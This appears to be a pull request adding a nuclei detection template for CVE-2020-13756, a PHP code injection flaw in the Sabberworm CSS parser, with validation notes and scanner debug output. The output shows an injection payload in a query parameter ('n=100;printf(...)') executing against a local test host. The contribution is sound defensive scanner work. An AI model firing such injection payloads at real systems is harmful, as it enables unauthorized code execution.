/claim #14249

PR Information

[!NOTE] Vulnerable environment details shared via email.

• Added CVE-2020-13756
• References:
  • http://packetstormsecurity.com/files/157923/Sabberworm-PHP-CSS-Code-Injection.html
  • http://seclists.org/fulldisclosure/2020/Jun/7
  • https://github.com/MyIntervals/PHP-CSS-Parser
  • https://nvd.nist.gov/vuln/detail/CVE-2020-13756

Template validation

• Validated with a host running a vulnerable version and/or configuration (True Positive)
• Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details (leave it blank if not applicable)

Debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

                projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2020-13756] Dumped HTTP request for http://localhost:8080/?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22);

GET /?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22); HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2020-13756] Dumped HTTP response http://localhost:8080/?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22);

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Sat, 06 Dec 2025 04:15:54 GMT
Server: Apache/2.4.65 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/8.3.28

<br />
<b>Deprecated</b>:  preg_split(): Passing null to parameter #3 ($limit) of type int is deprecated in <b>/var/www/html/vendor/sabberworm/php-css-parser/lib/Sabberworm/CSS/Parsing/ParserState.php</b> on line <b>285</b><br />
<pre>36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FB36SKVL67Ko4iekxgJznUn4TF2FBArray
(
    [0] => Sabberworm\CSS\Property\Selector Object
        (
            [sSelector:Sabberworm\CSS\Property\Selector:private] => #test .help
            [iSpecificity:Sabberworm\CSS\Property\Selector:private] => 110
        )

)
</pre>
[CVE-2020-13756:Sabberworm randstr] [http] [critical] http://localhost:8080/?n=100;printf(%2236SKVL67Ko4iekxgJznUn4TF2FB%22);
[INF] Scan completed in 6.448437ms. 1 matches found.

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server